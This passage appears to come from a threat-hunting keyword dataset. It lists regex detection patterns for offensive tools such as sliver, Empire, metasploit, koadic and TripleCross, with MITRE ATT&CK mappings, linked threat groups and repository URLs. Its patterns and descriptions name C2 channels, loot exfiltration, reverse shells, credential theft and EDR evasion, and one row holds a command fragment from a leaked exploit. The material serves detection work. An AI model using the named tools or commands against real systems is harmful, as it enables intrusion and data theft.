"*Send-CalendarNTLMLeak *",".{0,1000}Send\-CalendarNTLMLeak\s.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","58404"
"*sendcmd(*cmd:PSCMDMessage*",".{0,1000}sendcmd\(.{0,1000}cmd\:PSCMDMessage.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","58405"
"*Sending init packet to PSEXECSVC*",".{0,1000}Sending\sinit\spacket\sto\sPSEXECSVC.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","58406"
"*Sending loot to pastebin webserver.*",".{0,1000}Sending\sloot\sto\spastebin\swebserver\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58407"
"*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","58408"
"*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","58409"
"*Sending msf payload *",".{0,1000}Sending\smsf\spayload\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","58410"
"*Sending PSExecSVC version 190 *",".{0,1000}Sending\sPSExecSVC\sversion\s190\s.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","58411"
"*Sending Sirep payload*",".{0,1000}Sending\sSirep\spayload.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","58412"
"*sendmail -osendmail chmod +x sendmail*",".{0,1000}sendmail\s\-osendmail\schmod\s\+x\ssendmail.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver  buffer overflow allows a string passed to popen() call to be controlled by an attacker  arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","58414"
"*sends the jscript file to the rat (JS and HTA only) to be evaulated in line. Useful for Gadget2JS payloads*",".{0,1000}sends\sthe\sjscript\sfile\sto\sthe\srat\s\(JS\sand\sHTA\sonly\)\sto\sbe\sevaulated\sin\sline\.\sUseful\sfor\sGadget2JS\spayloads.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58415"
"*Send-TelegramMessage -message *",".{0,1000}Send\-TelegramMessage\s\-message\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","58416"
"*SendToPasteBin.ps1*",".{0,1000}SendToPasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58417"
"*sense2john.py*",".{0,1000}sense2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58418"
"*sensepost/goDoH*",".{0,1000}sensepost\/goDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","58419"
"*sensepost/godoh*",".{0,1000}sensepost\/godoh.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","58420"
"*sensepost/impersonate*",".{0,1000}sensepost\/impersonate.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","58421"
"*sensepost/kwetza*",".{0,1000}sensepost\/kwetza.{0,1000}","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","N/A","7","645","238","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z","58422"
"*sensepost/rattler*",".{0,1000}sensepost\/rattler.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","58423"
"*sensepost/reGeorg*",".{0,1000}sensepost\/reGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","58424"
"*sensepost/ruler*",".{0,1000}sensepost\/ruler.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","58425"
"*sensepost/susinternals*",".{0,1000}sensepost\/susinternals.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","1","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","58426"
"*sensepost/wiresocks*",".{0,1000}sensepost\/wiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","58427"
"*sensitive_files_win.txt*",".{0,1000}sensitive_files_win\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58428"
"*Sensitivelocalfiles.txt*",".{0,1000}Sensitivelocalfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","58429"
"*senzee1984/EDRPrison*",".{0,1000}senzee1984\/EDRPrison.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","1","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","58430"
"*senzee1984/InflativeLoading*",".{0,1000}senzee1984\/InflativeLoading.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","58431"
"*senzee1984/micr0_shell*",".{0,1000}senzee1984\/micr0_shell.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","58432"
"*senzee1984/MutationGate*",".{0,1000}senzee1984\/MutationGate.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","58433"
"*seq.localtonet.com/api*",".{0,1000}seq\.localtonet\.com\/api.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","58434"
"*SeRestorePrivilegePoC.exe*",".{0,1000}SeRestorePrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58435"
"*seriously_nothing_shady_here*",".{0,1000}seriously_nothing_shady_here.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58436"
"*Serve Pyramid files over HTTP/S and provide basic authentication.*",".{0,1000}Serve\sPyramid\sfiles\sover\sHTTP\/S\sand\sprovide\sbasic\sauthentication\..{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","58437"
"*serve_ps1_payload*",".{0,1000}serve_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","58438"
"*Server enforces NLA; switching to 'fake server' mode*",".{0,1000}Server\senforces\sNLA\;\sswitching\sto\s\'fake\sserver\'\smode.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58439"
"*server.py generate --address * --port * --output * --source*",".{0,1000}server\.py\sgenerate\s\-\-address\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-output\s.{0,1000}\s\-\-source.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","58443"
"*server.sin_port = htons(3567)*",".{0,1000}server\.sin_port\s\=\shtons\(3567\).{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","58445"
"*server/capture/http_ntlm*",".{0,1000}server\/capture\/http_ntlm.{0,1000}","offensive_tool_keyword","metasploit","llmnr spoofing used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58446"
"*server/modules/csharp/*",".{0,1000}server\/modules\/csharp\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58447"
"*server/ToRat_server*",".{0,1000}server\/ToRat_server.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","58448"
"*server@egress-asses.com*",".{0,1000}server\@egress\-asses\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","#email","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","58449"
"*server=*port=53531*",".{0,1000}server\=.{0,1000}port\=53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","58450"
"*-server=http://127.0.0.1:4002*",".{0,1000}\-server\=http\:\/\/127\.0\.0\.1\:4002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","58451"
"*server-7566091c4e4a2a24.js*",".{0,1000}server\-7566091c4e4a2a24\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","58452"
"*server-console.exe +*",".{0,1000}server\-console\.exe\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","58453"
"*server-console.py --mifi-ip *",".{0,1000}server\-console\.py\s\-\-mifi\-ip\s.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","58454"
"*ServerlessRedirector-main*",".{0,1000}ServerlessRedirector\-main.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","58456"
"*--server-port * --server-ip * --proxy-ip * --proxy-port *",".{0,1000}\-\-server\-port\s.{0,1000}\s\-\-server\-ip\s.{0,1000}\s\-\-proxy\-ip\s.{0,1000}\s\-\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","58457"
"*serverscan.linux.elf*",".{0,1000}serverscan\.linux\.elf.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","#linux","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58458"
"*serverscan.linux.so*",".{0,1000}serverscan\.linux\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 